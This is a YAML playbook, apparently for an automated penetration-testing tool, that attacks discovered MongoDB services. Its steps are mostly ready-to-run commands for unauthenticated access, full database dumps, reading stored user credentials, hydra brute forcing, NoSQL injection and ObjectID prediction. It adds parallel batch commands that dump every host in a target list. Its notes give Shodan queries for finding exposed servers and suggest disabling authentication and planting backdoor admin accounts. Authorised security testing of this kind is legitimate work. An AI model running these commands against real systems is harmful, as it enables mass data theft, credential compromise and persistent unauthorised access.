id: mongodb_pentesting
name: MongoDB Penetration Testing (Ports 27017, 27018)
description: Comprehensive MongoDB enumeration, authentication bypass, and data extraction based on HackTricks methodology
category: enumeration
risk_level: critical
batch_compatible: true

triggers:
  - id: trigger_mongodb_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [27017, 27018, 27019, 28017] }
      protocol: { "$in": ["mongodb", "tcp"] }
    required_count: 1
    priority: 7
    description: Triggers when MongoDB service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: mongodb_enumeration
    name: MongoDB Service Enumeration
    description: Banner grabbing and version detection
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV --script mongodb-info,mongodb-databases -p {port} {host}"
        preferred: true
        notes: "MongoDB version and database enumeration"
        requires_elevation: false
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port} --eval 'db.version()'"
        preferred: false
        notes: "MongoDB version check via mongo client"
        requires_elevation: false

  - id: mongodb_auth_check
    name: MongoDB Authentication Check
    description: Check if authentication is enabled or bypassed
    order: 2
    timeout_seconds: 60
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/admin --eval 'db.runCommand({listDatabases: 1})'"
        preferred: true
        notes: "Test unauthenticated access (default in old versions)"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script mongodb-brute {host}"
        preferred: false
        notes: "Check if credentials are required via brute force attempt"
        requires_elevation: false

  - id: mongodb_database_enumeration
    name: MongoDB Database and Collection Enumeration
    description: List all databases and collections
    order: 3
    timeout_seconds: 120
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port} --eval 'db.adminCommand({listDatabases: 1})'"
        preferred: true
        notes: "List all databases (requires read access)"
        requires_elevation: false
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/{database} --eval 'db.getCollectionNames()'"
        preferred: true
        notes: "List all collections in a database"
        requires_elevation: false

  - id: mongodb_data_extraction
    name: MongoDB Data Extraction
    description: Dump database contents and sensitive information
    order: 4
    timeout_seconds: 300
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/{database} --eval 'db.{collection}.find().pretty()'"
        preferred: true
        notes: "Dump all documents from a collection"
        requires_elevation: false
      - tool: mongoexport
        platforms: [linux, macos, windows]
        command: "mongoexport --host {host}:{port} --db {database} --collection {collection} --out {collection}_dump.json"
        preferred: true
        notes: "Export collection to JSON file"
        requires_elevation: false
      - tool: mongodump
        platforms: [linux, macos, windows]
        command: "mongodump --host {host}:{port} --out mongodb_dump_{host}"
        preferred: true
        notes: "Dump entire MongoDB instance to BSON files"
        requires_elevation: false

  - id: mongodb_user_enumeration
    name: MongoDB User Enumeration
    description: Extract user accounts and credentials
    order: 5
    timeout_seconds: 120
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/admin --eval 'db.system.users.find().pretty()'"
        preferred: true
        notes: "Enumerate MongoDB users (admin database)"
        requires_elevation: false
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/admin --eval 'db.runCommand({usersInfo: 1})'"
        preferred: false
        notes: "Get detailed user information"
        requires_elevation: false

  - id: mongodb_brute_force
    name: MongoDB Authentication Brute Force
    description: Brute force MongoDB credentials
    order: 6
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt mongodb://{host}:{port}"
        preferred: true
        notes: "MongoDB credential brute forcing"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script mongodb-brute --script-args userdb=users.txt,passdb=passwords.txt {host}"
        preferred: false
        notes: "Nmap MongoDB brute force"
        requires_elevation: false

  - id: mongodb_javascript_injection
    name: MongoDB JavaScript Injection
    description: Test for NoSQL injection vulnerabilities
    order: 7
    timeout_seconds: 180
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/{database} --eval 'db.{collection}.find({\"$where\": \"return true\"})'"
        preferred: true
        notes: "Test $where operator for JavaScript injection"
        requires_elevation: false
      - tool: nosqlmap
        platforms: [linux, macos, windows]
        command: "python nosqlmap.py -t {protocol}://{host}:{port}/endpoint -p parameter"
        preferred: false
        notes: "Automated NoSQL injection scanner"
        requires_elevation: false

  - id: mongodb_objectid_prediction
    name: MongoDB ObjectID Prediction
    description: Predict ObjectIDs to access unauthorized documents
    order: 8
    timeout_seconds: 300
    commands:
      - tool: mongo-objectid-predict
        platforms: [linux, macos, windows]
        command: "python mongo-objectid-predict.py {starting_objectid} 1000"
        preferred: true
        notes: "Generate predicted ObjectIDs for IDOR attacks"
        requires_elevation: false

  - id: mongodb_config_extraction
    name: MongoDB Configuration Extraction
    description: Extract MongoDB configuration for security analysis
    order: 9
    timeout_seconds: 60
    commands:
      - tool: mongo
        platforms: [linux, macos, windows]
        command: "mongo {host}:{port}/admin --eval 'db.runCommand({getCmdLineOpts: 1})'"
        preferred: true
        notes: "Extract MongoDB configuration and command-line options"
        requires_elevation: false
      - tool: bash
        platforms: [linux, macos]
        command: "grep 'noauth.*true' /opt/bitnami/mongodb/mongodb.conf 2>/dev/null || grep 'auth.*true' /etc/mongod.conf 2>/dev/null"
        preferred: false
        notes: "Check if auth is enabled in config file (requires file system access)"
        requires_elevation: false

metadata:
  tools:
    - mongo
    - mongodump
    - mongoexport
    - nmap
    - hydra
    - nosqlmap
    - mongo-objectid-predict
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb
    - https://github.com/andresriancho/mongo-objectid-predict
    - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection
  techniques:
    - Unauthenticated access exploitation
    - Database and collection enumeration
    - Data exfiltration (JSON/BSON dumps)
    - User credential extraction
    - NoSQL injection ($where operator)
    - ObjectID prediction for IDOR
    - Authentication brute forcing
    - Configuration disclosure
  batch_commands:
    enum_all: "parallel -j 10 'nmap -sV --script mongodb-info,mongodb-databases -p 27017 {}' :::: {targets_file}"
    dump_all: "parallel -j 5 'mongodump --host {} --out dumps/{}' :::: {targets_file}"
  notes: |
    MongoDB is a NoSQL document database that often has weak default security.

    COMMON MISCONFIGURATIONS:
    - No authentication required (default in MongoDB < 2.6)
    - Bind to 0.0.0.0 (exposed to internet)
    - Default port 27017 open to public
    - Authorization disabled (noauth=true in config)

    AUTHENTICATION:
    - By default, older MongoDB versions don't require authentication
    - Admin database often has default/weak credentials
    - SCRAM-SHA-1/SCRAM-SHA-256 authentication in newer versions

    OBJECTID STRUCTURE (12 bytes):
    - 4 bytes: Unix timestamp (seconds since epoch)
    - 3 bytes: Machine identifier
    - 2 bytes: Process ID
    - 3 bytes: Incremental counter

    IDOR via ObjectID prediction:
    - Given one ObjectID, can predict others by incrementing counter/timestamp
    - Useful for accessing unauthorized documents
    - Tool: mongo-objectid-predict generates ~1000 probable IDs

    NOSQL INJECTION:
    - $where operator allows JavaScript execution
    - $ne (not equal), $gt (greater than) operators for auth bypass
    - Example: {username: {$ne: null}, password: {$ne: null}}
    - Can lead to authentication bypass and data extraction

    DATA EXTRACTION:
    - mongodump: Binary BSON format (fastest, complete backup)
    - mongoexport: JSON/CSV format (human-readable)
    - mongo shell: Interactive queries with .pretty() formatting

    SHODAN QUERIES:
    - "mongodb server information" -"partially enabled" (full open)
    - "mongodb server information" "partially enabled" (partial auth)
    - port:27017 mongodb

    POST-EXPLOITATION:
    - Look for credentials in databases (users, admin, config)
    - Check for PII, financial data, API keys
    - Modify config to disable auth (if root access)
    - Plant backdoor admin accounts
